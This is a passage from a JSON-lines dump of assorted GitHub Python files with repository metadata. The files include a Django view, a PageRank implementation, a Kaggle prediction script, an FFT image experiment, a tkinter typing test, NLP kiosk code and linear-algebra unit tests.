rel.item2.set(new_items)\n items_same_parent = rel.item2.all()\n same_parent_relation_2(items_same_parent)\n\n data = dict(zip(file[::2],file[1::2]))\n \n for key,value in data.items():\n \n items_list = value.split(', ')\n items_query = [ Items.objects.get(name = i) for i in items_list]\n #check whether relation already exist\n\n item_id = Items.objects.get(name = key).id\n relation = Relation(item1 = Items.objects.get(pk=item_id) , relation = type_relation)\n relation.save()\n relation.item2.set(items_query)\n items_same_parent = relation.item2.all()\n same_parent_relation_2(items_same_parent)\n same_parent_relation_2(items_query)\n\n \n\"\"\"\nФункция, которая создает связь является частью одного раздела\nпока не учитывает выбор на форме\nплюс надо добавить обработчик других связей\n\"\"\"\n\ndef same_parent_relation_2(items_same_parent):\n try:\n for item in items_same_parent:\n q = items_same_parent.exclude(name = item)\n item_id = Items.objects.get(name = item).id\n relation = Relation(item1 = Items.objects.get(pk = item_id), relation = '6')\n relation.save()\n relation.item2.set(q) \n except:\n pass\n\n","repo_name":"anyaarz/analytics","sub_path":"dataprocessing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1633076820","text":"import sys\nif sys.version_info.major == 2:\n\trange = xrange\n\n\ndef solution():\n\tresult = sum(1\n\t\tfor i in range(1, 10000000)\n\t\tif get_chain(i) == 89)\n\treturn str(result)\n\n\nchain = (1, 89)\n\ndef get_chain(n):\n\twhile n not in chain:\n\t\tn = square_digit_chain(n)\n\treturn n\n\n\ndef square_digit_chain(n):\n\tresult = 0\n\twhile n > 0:\n\t\tresult += total[n % 1000]\n\t\tn //= 1000\n\treturn result\n\ntotal = [sum(int(c)**2 for c in str(i)) for i in range(1000)]\n\n\nif __name__ == \"__main__\":\n\tprint(solution())\n","repo_name":"AmberJBlue/Project-Euler-Solutions","sub_path":"python/51-100/92.py","file_name":"92.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72021408884","text":"import numpy as np \nimport pandas as pd \n\nimport os\nprint(os.listdir(\"../input\"))\ndf_train = pd.read_csv(\"../input/train_V2.csv\")\ndf_test = pd.read_csv(\"../input/test_V2.csv\")\nprint(df_train.head())\nprint(df_test.head())\ndf_train.info()\ndf_test.info()\nprint(\"No. of rows in train set: \", len(df_train))\nprint(\"No. of rows in test set: \", len(df_test))\ndf_train = df_train.dropna(axis=0)\ndf_test = df_test.dropna(axis=0)\nprint(\"No. of rows in train set: \", len(df_train))\nprint(\"No. of rows in test set: \", len(df_test))\n# features = df_train.columns.drop([\"winPlacePerc\", \"Id\", \"groupId\", \"matchId\"])\nfeatures = ['walkDistance', 'killPlace', 'boosts', 'weaponsAcquired']\ntrain_X = df_train[features]\ntrain_y = df_train['winPlacePerc']\ntest_X = df_test[features]\n\n#one hot encode\ntrain_X = pd.get_dummies(train_X)\ntest_X = pd.get_dummies(test_X)\nfrom sklearn.ensemble import RandomForestRegressor\n\nforest_model = RandomForestRegressor(random_state=42)\nforest_model.fit(train_X, train_y)\npredict_y = forest_model.predict(test_X)\npredict_y\noutput = pd.DataFrame({'Id': df_test.Id,\n 'winPlacePerc': predict_y})\n\noutput.to_csv('submission.csv', index=False)\noutput","repo_name":"aorursy/new-nb-7.2","sub_path":"tanyeejet_pubg-finish-placement-prediction-rf.py","file_name":"tanyeejet_pubg-finish-placement-prediction-rf.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5603726574","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport mathlib.random as rnd\nimport mathlib.misc as misc\n\n# Constants. \ngrid_size = 1024\nmin_distance = 1 # size of a single cell in Mpc.\n\n# Create the random number generator.\nrandom = rnd.Random(78379522)\n\n# The orders of the power spectrum.\npowers = [-1,-2,-3]\n\ndef main():\n\n # Generate the random uniform numbers that \n # are later transformed to normal distributed variablaes.\n # The numbers are generated once to reduce computational time.\n random_numbers = random.gen_uniforms(grid_size*grid_size*2)\n\n # Create the plots for n = -1, n = -2, n = -3 \n for power in powers:\n\n # Generate the field matrix.\n matrix = misc.generate_matrix_2D(grid_size, min_distance, \n gen_complex, random_numbers, power)\n\n #Give it the correct symmetry. \n field = misc.make_hermitian2D(matrix)\n \n # Plot it\n\n # The field is real, but it is still treated as a complex\n # value this, we have to take the r eal part. It is also multiplied\n # by grid_size^2 to correct for the normalization constant \n # in np.fft.ifft2.\n \n plt.imshow(np.fft.ifft2(field).real * grid_size*grid_size)\n plt.xlabel('Distance [Mpc]')\n plt.ylabel('Distance [Mpc]')\n plt.title('n = {0}'.format(power))\n plt.colorbar()\n plt.savefig('./Plots/2_field_{0}.pdf'.format(power))\n plt.figure()\n\ndef gen_complex(k, n, rand1, rand2):\n \"\"\"\n Generate a complex number using the power\n spectrum.\n In:\n param:k -- The magnitude of the wavenumber.\n param:n -- The order of the power law.\n param: rand1 -- A random uniform variable between 0 and 1.\n param: rand2 -- A random uniform variables between 0 and 1.\n\n \"\"\"\n\n sigma = 0\n\n if n == -2:\n sigma = 1/k\n else:\n sigma = np.sqrt(k**n)\n \n # Determine the complex value\n a,b = random.gen_normal_uniform(0,sigma,rand1,rand2)\n return complex(a,b)\n\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"1633376/NUR-Assigment-2","sub_path":"Code/assigment_2.py","file_name":"assigment_2.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27937548338","text":"\nszam= 6\nprint (szam)\n\n\nszam1 = 10\nszam2 = 5\nkulonbseg = szam1 - szam2\nprint (kulonbseg)\n\ntort1 = 3.5\ntort2 = 5.5\nszorzat = tort1 * tort2\nprint(szorzat)\n\nszam3 = 5\nszam4 = 6\nnagyobb = max(szam3, szam4)\nprint (nagyobb)\n\nszam5 = 5\nszam6 = 10\nif szam != 0:\n tort_alak = szam5 / szam6\n print(f\"{szam5} / {szam6} = {tort_alak}\")\n\nszam7 = int(input(\"10:\"))\nszam8 = int(input(\"20:\"))\nfor i in range(szam7, szam8):\n print(i, end=' ')\nprint()\n\nszam9 = 10\nszam10 = 20\nfor i in range(szam9, szam10 + 1):\n print(i, end=' ')\n \n\n\n","repo_name":"Bence681/python2023","sub_path":"órai feladatok.py","file_name":"órai feladatok.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12770623563","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 24 14:03:19 2014\n\n@author: huajh\n\"\"\"\n\n\nimport numpy as np\n#from matplotlib import pyplot as plt\nimport sys,os \nimport cv2\n\nfile = sys.argv[1]\n#file2 = sys.argv[2]\n\ndef rotate_image(image, angle):\n image_center = tuple(np.array(image.shape[1::-1]) / 2)\n rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)\n result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)\n return result\n\n\nif __name__ == '__main__': \n \n #fname = 'moonlanding.png'\n fname ='lenaNoise.jpg'\n # your code here, you should get this image shape when done:\n # Image shape: (474, 630)\n #im = plt.imread(fname).astype(float)\n im = cv2.imread(file)\n #im2 = cv2.imread(file2)\t\n #print \"Image shape: %s\" % str(im.shape)\n \n \n # Assign the 2d FFT to `F`\n #...\n F = np.fft.fft2(im)\n F2 = np.fft.fft2(rotate_image(im,0.1))\n\t\n # n = F.size\n # timestep = 0.1\n # freq = np.fft.fftfreq(n, d=timestep)\n # Define the fraction of coefficients (in each direction) we keep\n keep_fraction = 0.5\n \n # Call ff a copy of the original transform. Numpy arrays have a copy\n # method for this purpose.\n # ...\n ff = F.copy()\n #ff = np.fft.fftshift(ff)\n #n = ff.size\n #ff2 = np.fft.fftfreq(n, d=0.5)\n ff2 = F2.copy()\n # Set r and c to be the number of rows and columns of the array.\n # ....\n try:\n r,c,a = ff.shape\n except:\n r,c = ff.shape\n\n # Set to zero all rows with indices between r*keep_fraction and\n # r*(1-keep_fraction):\n #... \n #pos_mask = np.where(ff > 0)\n #ff[pos_mask:pos_mask] = 0\n #ff[:,pos_mask:pos_mask] = 0\t\n #n = ff.size\n #timestep = 0.1\n #freq = np.fft.fftfreq(n, d=timestep)\n\t\n\t\n max_x = np.amax(ff, axis=1) \n max = np.amax(ff) \n min = np.amin(ff)\n mean_v = np.mean(ff)\n median = np.median(ff)\n #ff[:] = np.where((ff >= max) & (ff != max) , ff[:].real,ff[:].real)\t\n #ff[:] = np.where((ff < max) & (ff > mean_v), ff[:],0)\t\t\n\t# odd , 1::2\n\t\n # work !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\t\n #ff[::2,1::2] = 1\n #ff[::2,::2] = 1\n\n ff[::2,1::2] = ff2[::2,1::2]\n ff[::2,::2] = ff2[::2,::2]\n\t\n #ff[::2,::2] = 1\n #ff[1::2,1::2] = 1\n #ff[1::2,1::2] = 0\t\n #ff[::2,1::2] = ff[1::2,::2].imag\t\n #ff[:] = np.where((ff ) , ff[:].real,ff[:].real)\n #even\n #ff[:,1::2] = 1 \n #odd\n #ff[::2,::2] = 0\n #ff[1::2,::2] = -1\n #ff[::2,1::2] = -1\t\n #ff[1::2,1::2] = ff[1::2,1::2].imag\t\n #ff[::2,1::2] = ff[1::2,::2].imag\t\n #ff[::2,1::2] = ff[::2,1::2].real\n #ff[:] = ff[:].real\n #ff[:] = np.where((ff <= mean_v) , ff[:].imag,ff[:].imag)\t\n #ff[0:] = np.where((ff[0:] >= max_x) , ff[0:],ff[0:])\n\t\n\t\n #ff[:] = np.where(ff == max, mean_v,ff[:])\t\n #ff[int(np.where(a==np.max(a))):int(np.where(a==np.max(a)))] = 0\n #ff[:,int(c*keep_fraction):int(c*(1-keep_fraction))] = 0\n\t\n #ff[int(r*keep_fraction):int(r*(1-keep_fraction))] = 0\n #ff[:,int(c*keep_fraction):int(c*(1-keep_fraction))] = 0\n\t\n #sample_freq = fftpack.fftfreq(sig.size, d=time_step)\n #pos_mask = np.where(sample_freq > 0)\n #freqs = sample_freq[pos_mask]\n #peak_freq = freqs[power[pos_mask].argmax()]\n #ff[np.abs(sample_freq) > peak_freq] = 0\n #ff = np.delete(ff, np.argmax(ff))\n #max_x = np.amax(ff, axis=0) \n #mean_v = np.mean(ff)\n #print (mean_v )\n #im_new = np.fft.ifft2(ff).imag\n im_new = np.fft.ifft2(ff).real\t\n im_new2 = np.fft.ifft2(ff2).real\t\n\t\n im_new = cv2.convertScaleAbs(im_new)\t\t\n # hsv = cv2.cvtColor(im_new, cv2.COLOR_BGR2HSV)\n # value = 5 #whatever value you want to add\n # hsv[:,:,2] += value\n # im_new = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\t\n #im_new = cv2.convertScaleAbs(im_new)\t\n #im_new = cv2.convertScaleAbs(im_new)\n #im_new = cv2.addWeighted(im_new, 0.1, im, 0.9, 3)\n #im_new = cv2.subtract(im_new,im)\n #im_new = (255-im_new)\n\n cv2.imwrite(file+\"newm1.jpg\", im_new)\n cv2.imwrite(file+\"rot2.jpg\", im_new2)\t\n","repo_name":"Wiffzack/Examples","sub_path":"fft/fft_wiggle.py","file_name":"fft_wiggle.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31715325156","text":"import os\nimport random\nimport re\nimport sys\nimport math\n\nDAMPING = 0.85\nSAMPLES = 10000\n\n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(\"Usage: python pagerank.py corpus\")\n corpus = crawl(sys.argv[1])\n ranks = sample_pagerank(corpus, DAMPING, SAMPLES)\n print(f\"PageRank Results from Sampling (n = {SAMPLES})\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n ranks = iterate_pagerank(corpus, DAMPING)\n print(f\"PageRank Results from Iteration\")\n for page in sorted(ranks):\n print(f\" {page}: {ranks[page]:.4f}\")\n\n\ndef crawl(directory):\n \"\"\"\n Parse a directory of HTML pages and check for links to other pages.\n Return a dictionary where each key is a page, and values are\n a list of all other pages in the corpus that are linked to by the page.\n \"\"\"\n pages = dict()\n\n # Extract all links from HTML files\n for filename in os.listdir(directory):\n if not filename.endswith(\".html\"):\n continue\n with open(os.path.join(directory, filename)) as f:\n contents = f.read()\n links = re.findall(r\"]*?)href=\\\"([^\\\"]*)\\\"\", contents)\n pages[filename] = set(links) - {filename}\n\n # Only include links to other pages in the corpus\n for filename in pages:\n pages[filename] = set(\n link for link in pages[filename]\n if link in pages\n )\n\n return pages\n\n\ndef transition_model(corpus, page, damping_factor):\n \"\"\"\n Return a probability distribution over which page to visit next,\n given a current page.\n\n With probability `damping_factor`, choose a link at random\n linked to by `page`. With probability `1 - damping_factor`, choose\n a link at random chosen from all pages in the corpus.\n \"\"\"\n transition_model = dict()\n\n # pages linked in current page\n nexts = corpus.get(page)\n\n # if there is no link in the current page, equal probability between all pages of the corpus\n if len(nexts) == 0:\n for key in corpus.keys():\n transition_model[key] = 1/len(corpus)\n else:\n # initialized with the equal probability on landing on a random page\n for next_page in nexts:\n transition_model[next_page] = damping_factor/len(nexts)\n\n # probability of choosing a page linked on the current one\n for page in corpus.keys():\n if page not in transition_model:\n transition_model[page] = 0\n transition_model[page] += (1 - damping_factor)/len(corpus.keys())\n\n # normalize results\n sum_trans = sum(transition_model.values())\n\n for key in transition_model.keys():\n transition_model[key] = round((transition_model[key]/sum_trans), 4)\n\n return transition_model\n\n\ndef sample_pagerank(corpus, damping_factor, n):\n \"\"\"\n Return PageRank values for each page by sampling `n` pages\n according to transition model, starting with a page at random.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n # generate a random index for first page\n index = random.randint(0, len(corpus) - 1)\n page = list(corpus.keys())[index]\n\n page_ranks = dict()\n\n # initialize all ranks\n for key in corpus.keys():\n page_ranks[key] = 0\n\n # first page was chosen\n page_ranks[page] += 1/n\n\n # n iterations, but first page already chosen\n for i in range(n - 1):\n # get transition model\n trans_model = transition_model(corpus, page, damping_factor)\n\n page = getRandomPage(trans_model)\n # page was chosen\n page_ranks[page] += 1/n\n\n return page_ranks\n\n\ndef iterate_pagerank(corpus, damping_factor):\n \"\"\"\n Return PageRank values for each page by iteratively updating\n PageRank values until convergence.\n\n Return a dictionary where keys are page names, and values are\n their estimated PageRank value (a value between 0 and 1). All\n PageRank values should sum to 1.\n \"\"\"\n pagerank_dict = dict()\n # initialize first ranks, equal probability\n for key in corpus.keys():\n pagerank_dict[key] = round(1 / len(corpus), 4)\n\n max_value = 1\n while max_value > 0.001:\n max_value = 0\n for key in corpus.keys():\n new_value = 0\n\n # get pages pointing toward current page\n links_towards = get_pages_pointing_towards(corpus, key)\n\n for page in links_towards:\n if page != key:\n new_value += pagerank_dict[page] / len(corpus[page])\n\n # new rank of the page\n new_value = ((1 - damping_factor)/len(corpus)) + damping_factor * new_value\n\n # get max value of the change\n if max_value < pagerank_dict[key] - new_value:\n max_value = new_value\n\n pagerank_dict[key] = new_value\n\n # normalize results\n total_value = sum(pagerank_dict.values())\n # round results\n for key in pagerank_dict.keys():\n pagerank_dict[key] = round(pagerank_dict[key]/total_value, 4)\n\n return pagerank_dict\n\n\ndef get_pages_pointing_towards(corpus, page):\n \"\"\"\n Return the pages pointing towards page\n \"\"\"\n result = list()\n for key in corpus.keys():\n if page in corpus[key]:\n result.append(key)\n return result\n\n\ndef getRandomPage(transition_model):\n \"\"\"\n Return a random page knowing a transition model\n \"\"\"\n rand = random.randint(0, math.floor(sum(transition_model.values())*100))\n cell = 0\n for page in transition_model.items():\n cell += page[1]*100\n if rand <= cell:\n return page[0]\n\n print(rand)\n print(round(sum(transition_model.values())*100))\n print(cell)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ncaparros/CS50AI","sub_path":"week2/pagerank/pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71955932725","text":"import joblib\nfrom konlpy.tag import Okt\nfrom .ordermenu import orderParsing\n\nokt = Okt()\ntokenizer = joblib.load(\"./token.pkl\")\nrnd_clf = joblib.load(\"./nlp_sample.pkl\")\npad_sequences = joblib.load(\"./pad_sequences.pkl\")\n\n\n# 띄어쓰기 함수\ndef spacing_okt(wrongSentence):\n tagged = okt.pos(wrongSentence)\n corrected = \"\"\n for i in tagged:\n # print(i)\n if i[1] in ('Josa', 'PreEomi', 'Eomi', 'Suffix', 'Punctuation', 'Modifier'):\n corrected += i[0]\n else:\n corrected += \" \"+i[0]\n if corrected[0] == \" \":\n corrected = corrected[1:]\n return corrected\n\n\n# 처음 보는 문장 검사\ndef check_new_text(text):\n for x in text:\n if int(x) > 1:\n return True\n return False\n\n\ndef rndModel(new_sentence):\n stopwords = ['메뉴', '보이다', '줄다', '이요', '요', '의', '로', '가', '이', '은', '들', '는', '좀',\n '잘', '걍', '과', '도', '를', '으로', '자', '에', '와', '한', '하다', '저기요', '주세요', '할게요', '하세요', '주다']\n # global order_data\n text = new_sentence\n new_sentence = spacing_okt(new_sentence)\n print(new_sentence)\n new_sentence = new_sentence.replace(\"[^ㄱ-ㅎㅏ-ㅣ가-힣 ]\", \"\")\n # 토큰화\n new_sentence = okt.morphs(new_sentence, stem=True)\n\n # 불용어 제거\n new_sentence = [word for word in new_sentence if not word in stopwords]\n\n # 정수 인코딩\n encoded = tokenizer.texts_to_sequences([new_sentence])\n print(new_sentence)\n # print(encoded)\n\n if check_new_text(encoded[0]) == False:\n print(\"이해할수 없는 단어\")\n\n else:\n deleteList = []\n for x in range(len(encoded[0])):\n if encoded[0][x] == 1:\n deleteList.append(x)\n deleteList.sort(reverse=True)\n\n if len(deleteList):\n for x in deleteList:\n encoded[0].pop(x)\n # 패딩\n pad_new = pad_sequences(encoded, maxlen=4)\n # print(pad_new)\n\n # 예측\n # score = float(rnd_clf.predict(pad_new))\n # print(score)\n result = rnd_clf.predict(pad_new)\n print(result[0])\n result_set = {'result': int(result[0])}\n name = \"\"\n if result[0] == 9:\n result_set = orderParsing(text)\n elif result[0] == 3:\n if text.find(\"매장\") != -1:\n name = \"매장\"\n if text.find(\"포장\") != -1:\n name = \"포장\"\n result_set = {'result': int(result[0]), '0': {'name': name}}\n print(result_set)\n return result_set\n\n\nif __name__ == \"__main__\":\n while(1):\n temp = input()\n if(temp == 'stopModel'):\n joblib.dump(tokenizer, 'token.pkl')\n joblib.dump(rnd_clf, 'nlp_sample.pkl')\n joblib.dump(rndModel, 'rndModel')\n break\n else:\n rndModel(temp)\n","repo_name":"chunwookJoo/kiosk_project","sub_path":"kiosk/modules/nlp/nlp.py","file_name":"nlp.py","file_ext":"py","file_size_in_byte":2928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5692956488","text":"from tkinter import *\r\nfrom PIL import ImageTk,Image\r\nfrom timeit import default_timer as timer\r\nimport random\r\n\r\n#setting a variable for restarting the test\r\nx=0\r\n\r\n#creating the main screen for starting the game\r\nroot = Tk()\r\nroot.title(\"A Writing Test\")\r\nroot.geometry(\"500x200\")\r\n\r\n#function for beginning the test\r\n\r\ndef begin():\r\n\r\n#using the variable to make it possible to destroy the original screen and root2 screens(the second screen created when the start button is clickeed)\r\n global x\r\n if x==0:\r\n root.destroy()\r\n x=x+1\r\n\r\n#checking the results using .get to get what the user entered and to check it across the word selected randomly and ending the timer\r\n def results():\r\n if entry.get()==words[word]:\r\n end=timer()\r\n \r\n print(\"You finished in \" + str(end-start) + \" seconds!\")\r\n else:\r\n print(\"Wrong Answer Try again, check your spelling\")\r\n\r\n#creating a list of sentences and randomly selecting from it\r\n words = [\"typing starts here for always\", \"terrible is the man who falls\", \"dunking is for the best of the players\", \"tugging is used in tug of war\", \"hippo's seem to love the water\",\r\n \"You bite up because of your lower jaw\", \"He created a pig burger out of beef\", \"She advised him to come back at once\", \"Nobody loves a pig wearing lipstick\"]\r\n word=random.randint(0,(len(words)-1))\r\n\r\n#starting the timer\r\n start=timer()\r\n\r\n#creating a new screen to replace the main when start button is clicked and root.destroy is called on\r\n root2 = Tk()\r\n root2.title(\"A Writing Test\")\r\n root2.geometry(\"500x200\")\r\n\r\n#adding a background image\r\n my_img = ImageTk.PhotoImage(Image.open(\"bimg.jpg\"))\r\n my_Label = Label(image=my_img)\r\n my_Label.pack()\r\n\r\n#adding a label that shows the word randomly selected\r\n wordLabel = Label(root2, text=words[word], bg=\"yellow\")\r\n wordLabel.place(x=275, y=45)\r\n\r\n#creating an instruction label\r\n label1 = Label(root2, text=\"How fast can you type this word?\")\r\n label1.place(x=50, y = 40)\r\n\r\n#creating an entry for the user to type in\r\n entry=Entry(root2)\r\n entry.place(x=225, y=80)\r\n\r\n#creating 2 buttons with commands attached to the functions above\r\n chButton = Button(root2, text=\"Submit\", command=results)\r\n chButton.place(x=225, y=120)\r\n\r\n reButton = Button(root2, text=\"Restart?\", command=begin)\r\n reButton.place(x=150, y=120)\r\n\r\n root.mainloop()\r\n\r\n#adding an image to use as a background using ImageTk from Pillow which used PIL\r\nmy_img = ImageTk.PhotoImage(Image.open(\"bimg.jpg\"))\r\nmy_Label = Label(image=my_img)\r\nmy_Label.pack()\r\n\r\n#adding a starting label requesting the user to click a button to begin\r\nstLabel = Label(root, text=\"Click Start to Begin the Test\", bg=\"yellow\", width=20, height=3)\r\nstLabel.place(x=170, y=25)\r\n\r\n#adding a starting button\r\nstButton = Button(root, text=\"Start\", command=begin, width=14, bg='grey')\r\nstButton.place(x=185, y=85)\r\n\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"sambeckfeld/SpeedTypingTest","sub_path":"SpeedTyping.py","file_name":"SpeedTyping.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452815215","text":"res = []\n# nums = [3,2,4]\n# target = 6\nnums = [2,7,11,15]\ntarget = 9\n\nfor i in range(len(nums)-1) :\n j = i + 1\n for j in range(j,len(nums)) :\n if nums[i] + nums[j] == target :\n res.extend([i, j])\nprint(res)","repo_name":"vxela/altera-batch5-","sub_path":"Weekend/LetCode Problems/TwoSum.py","file_name":"TwoSum.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"73946403765","text":"# --coding:utf-8--\n\n\n# @Author: 逸风\n# @Time: 2019-12-22 17:56\n\n\nclass Zone:\n def __init__(self):\n self.id = -1\n self.center = \"\"\n self.centre_point = -1\n self.name = \"\"\n\n @staticmethod\n def parse(zones_json_object):\n zones = Zone()\n zones.__dict__ = zones_json_object\n return zones\n\n\n","repo_name":"asfathermou/s3","sub_path":"entities/zone.py","file_name":"zone.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11153234231","text":"import unittest\nimport numpy as np\nimport numpy.testing as npt\n\nfrom ols_example import linalg\n\n################################################################################\n\nclass LinalgTestCase(unittest.TestCase):\n \"\"\"Class for linear algebra tests.\"\"\"\n\n ############################################################################\n\n def test_check_elements(self):\n \"\"\"check_elements\"\"\"\n\n empty_array = np.empty(10)\n full_array = np.ones(10)\n\n assert linalg.check_elements(empty_array), \"Test input empty array.\"\n assert linalg.check_elements(full_array), \"Test input full array.\"\n\n ############################################################################\n\n def test_check_2d(self):\n \"\"\"check_2d\"\"\"\n\n with self.assertRaises(Exception) as context:\n linalg.check_2d(1.0)\n self.assertTrue('Input must be an ndarray.' in str(context.exception))\n\n one_d = np.ones((10,))\n output = linalg.check_2d(one_d)\n\n one_d = np.ones((10,1))\n output = linalg.check_2d(one_d)\n\n one_d = np.ones((10,1,1))\n output = linalg.check_2d(one_d)\n\n two_d = np.ones((10,10))\n output = linalg.check_2d(two_d)\n\n two_d = np.ones((10,10,1))\n output = linalg.check_2d(two_d)\n\n ############################################################################\n\n def test_identity_matrix(self):\n \"\"\"identity_matrix\"\"\"\n\n true_identity = np.asarray([[1,0,0],[0,1,0],[0,0,1]])\n\n identity = linalg.identity_matrix(3)\n\n npt.assert_equal(true_identity, identity)\n\n ############################################################################\n\n def test_copy_matrix(self):\n \"\"\"copy_matrix\"\"\"\n\n input_arr = np.random.normal(0, 3, (10, 4))\n\n copy_arr = linalg.copy_matrix(input_arr)\n\n npt.assert_equal(input_arr, copy_arr)\n\n ############################################################################\n\n def test_is_invertible(self):\n \"\"\"is_invertible\"\"\"\n\n A = np.random.normal(0, 10, (10, 10))\n\n assert linalg.is_invertible(A), \"Flagged inveretible matrix as non-invertible.\"\n\n ############################################################################\n\n def test_transpose(self):\n \"\"\"transpose\"\"\"\n\n input_arr = np.random.normal(0, 3, (10, 4))\n\n true_transposed = input_arr.T\n\n transposed = linalg.transpose(input_arr)\n\n npt.assert_equal(true_transposed, transposed)\n\n ############################################################################\n\n def test_matmul(self):\n \"\"\"matmul\"\"\"\n\n A = np.random.normal(0, 3, (10, 2))\n B = np.random.normal(0, 3, (2, 10))\n\n True_C = A.dot(B)\n\n C = linalg.matmul(A, B)\n\n npt.assert_almost_equal(True_C, C)\n\n ############################################################################\n\n def test_invert_matrix(self):\n \"\"\"invert_matrix\"\"\"\n\n A = np.random.normal(0, 10, (10, 10))\n true_invert = np.linalg.inv(A)\n\n invert = linalg.invert_matrix(A)\n\n npt.assert_almost_equal(true_invert, invert)\n\nif __name__ == '__main__':\n unittest.main(failfast=True)\n","repo_name":"james-montgomery-blog/code_crash_course","sub_path":"Python/OLS/tests/test_linalg.py","file_name":"test_linalg.py","file_ext":"py","file_size_in_byte":3229,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4576466608","text":"import numpy as np\nfrom time import time\nfrom scipy.stats import spearmanr,kendalltau,rankdata\nimport math\nfrom sklearn.metrics import roc_auc_score\n\n## best cluster metrics :XB\ndef _xb(s, y):\n num_anomaly = np.sum(y==1)\n s_rank = np.sort(s)\n threshold = s_rank[-num_anomaly]\n c_normal, c_anomaly = np.mean(s_rank[:-num_anomaly]),np.mean(s_rank[-num_anomaly:])\n c = [c_anomaly if i >= threshold else c_normal for i in s]\n return sum((s-c)**2) / (len(s) * ((c_normal - c_anomaly) ** 2))\n\ndef XB(OD_scores,y):\n HPconfs = len(OD_scores)\n metrics = []\n for i in range(HPconfs):\n metrics.append( _xb(OD_scores[i],y))\n selected_index = np.argmax(metrics)\n\n return selected_index\n\ndef MC(OD_scores,_):\n HPconfs = len(OD_scores)\n rank_scores = [rankdata(score) for score in OD_scores]\n\n P = HPconfs - 1\n MC_scores = []\n for i in range(HPconfs):\n corr_sum = 0\n weight = np.ones((HPconfs,))\n weight[i] = 0\n weight = weight/np.sum(weight)\n random_HPconfss = np.random.choice(np.arange(HPconfs),size=P,replace=False,p=weight).tolist()\n\n for j in random_HPconfss:\n i_s,j_s = rank_scores[i],rank_scores[j]\n corr = kendalltau(i_s, j_s)[0]\n corr_sum += corr\n corr_sum/=(HPconfs-1)\n MC_scores.append(corr_sum)\n\n return np.argmax(MC_scores)\n\ndef HITS(OD_scores,_):\n # score_mat: (n_samples, n_HPconfs)\n score_mat = np.stack(OD_scores,axis=-1)\n \n\n rank_mat = rankdata(score_mat, axis=0)\n inv_rank_mat = 1 / rank_mat\n n_samples, n_HPconfs = score_mat.shape[0], score_mat.shape[1]\n\n hub_vec = np.full([n_HPconfs, 1], 1/n_HPconfs)\n auth_vec = np.zeros([n_samples, 1])\n\n hub_vec_list = []\n auth_vec_list = []\n\n hub_vec_list.append(hub_vec)\n auth_vec_list.append(auth_vec)\n\n for i in range(500):\n auth_vec = np.dot(inv_rank_mat, hub_vec)\n auth_vec = auth_vec/np.linalg.norm(auth_vec)\n\n # update hub_vec\n hub_vec = np.dot(inv_rank_mat.T, auth_vec)\n hub_vec = hub_vec/np.linalg.norm(hub_vec)\n\n # stopping criteria\n auth_diff = auth_vec - auth_vec_list[-1]\n hub_diff = hub_vec - hub_vec_list[-1]\n\n\n if np.abs(auth_diff.sum()) <= 1e-10 and np.abs(auth_diff.mean()) <= 1e-10 and np.abs(hub_diff.sum()) <= 1e-10 and np.abs(hub_diff.mean()) <= 1e-10:\n print('break at', i)\n break\n\n auth_vec_list.append(auth_vec)\n hub_vec_list.append(hub_vec)\n\n return np.argmax(hub_vec)\n\n\n\ndef all_model_select_algorithms(od_scores,AUCs,y):\n\n baseline_fn =[XB, MC,HITS]\n\n\n baseline_name = ['XB','MC','Hit']\n data= dict()\n for i in range(len(baseline_fn)):\n fn = baseline_fn[i]\n\n name = baseline_name[i]\n t0 = time()\n select_index = fn(od_scores,y)\n t1 = time()\n data[name] = AUCs[select_index]\n print('finish ',name,' in ',round(t1-t0,ndigits=4))\n\n\n print('\\n')\n\n return data\n\n\ndef getY(data_name,type):\n if type =='tab':\n return np.load('../data/'+data_name+'.npz')['y']\n elif type =='img':\n return np.load('../data/'+data_name+'.npz')['y']\n\n \n\n ","repo_name":"goldenNormal/AutomatedTrainingOD","sub_path":"eval_uoms/uoms_implement.py","file_name":"uoms_implement.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22999773721","text":"\"\"\" 